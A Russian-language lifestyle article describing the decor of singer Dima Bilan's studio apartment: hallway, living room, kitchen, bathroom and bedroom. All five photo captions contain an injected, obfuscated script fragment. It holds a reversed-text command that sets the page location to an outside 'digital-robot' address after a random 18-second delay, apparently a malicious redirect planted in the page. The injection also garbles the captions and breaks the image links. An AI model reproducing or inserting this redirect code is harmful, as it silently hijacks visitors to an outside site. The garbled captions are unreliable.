Квартира для холостяка: где живет Дима Билан?
Известный российский певец и актер Дима Билан несколько лет назад приобрел квартиру-студию в центре столицы. Дизайнеры интерьеров создали в ней шикарную обстановку в урбанистическом стиле, о которой мы подробно расскажем дальше.
Прихожая
Встречает гостей и хозяина дома глянцевая синяя входная дверь, за которой расположен небольшой коридор. Для обработки пола также выбраны глянцевые плиты, но уже в черном цвете. Потолок с прикрепленными к нему светильниками – белый. Отделка стен комбинированная. Часть окрашена в серый цвет, а вторая обработана деревянными панелями из американского ореха. Серый цвет в сочетании с этим деревом применяются для отделки остальных помещений.

Прихожая. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/thumbs/gallery/10/9594/797_3500_s421.jpg»>salon.ru
Гостиная
За черными плитами выложен светлый ламинат. Колонна из коричневого мрамора и металлическая фактурная перегородка визуально разделяют кухню от гостиной. Зона отдыха выделена небольшим ковром, расстеленным рядом с мягким уголком. У стены с телевизором находятся два кресла и декоративные элементы, типа большой вазы, картин. Освещение выполнено с помощью подвесных ламп с белыми абажурами, а также оригинальной люстры в форме ветви, крепящейся посередине. В комнате находится единственный экземпляр камина, в котором одновременно может гореть огонь и стекать по стенкам вода.

Гостиная. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/thumbs/gallery/10/9565/797_3500_s417.jpg»>salon.ru
Кухня
Кухонная зона гармонично сочетается с гостиной. Стены и фасады шкафчиков из одного материала. Дополняют рабочую зону столешница, фартук из темного камня, стальная техника, металлические навесные шкафчики. Для обедов поставлен деревянный раскладной стол и уютные кресла из бежевого велюра.

Кухня. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/thumbs/gallery/10/9587/835_3500_s305.jpg»>salon.ru
Санузел
За матовыми стеклянными панелями, установленными в одной из стен гостиной, расположена ванная комната. Для облицовки были подобраны большие зеркала, отражающие панели, делающие пространство значительно больше. Рядом с белоснежной ванной прикреплены панели из серого камня, придающие помещению богатый вид.

Санузел. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/thumbs/gallery/10/9536/835_3500_s339.jpg»>salon.ru
Спальня
Для спальни подобран насыщенный синий оттенок. По центру комнаты поставлена двуспальная кровать с изголовьем, состоящим из нескольких частей. Рядом стоят прикроватные тумбы, ночники, а в углу есть металлический торшер. Лоджия была присоединена к комнате. В итоге на невысоком подиуме появилась дополнительная зона отдыха, состоящая из пары кресел и маленького столика. Для создания более интимной обстановки, окна можно зашторить плотными гардинами оливкового цвета.

Спальня. Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torage/thumbs/gallery/10/9611/797_3500_s404.jpg»>salon.ru
Интерьер квартиры Димы Билана напоминает стильную холостяцкую берлогу, оснащенную всем необходимым для комфортной жизни.
Оставить комментарий
Оставляя комментарий, Вы принимаете пользовательское соглашение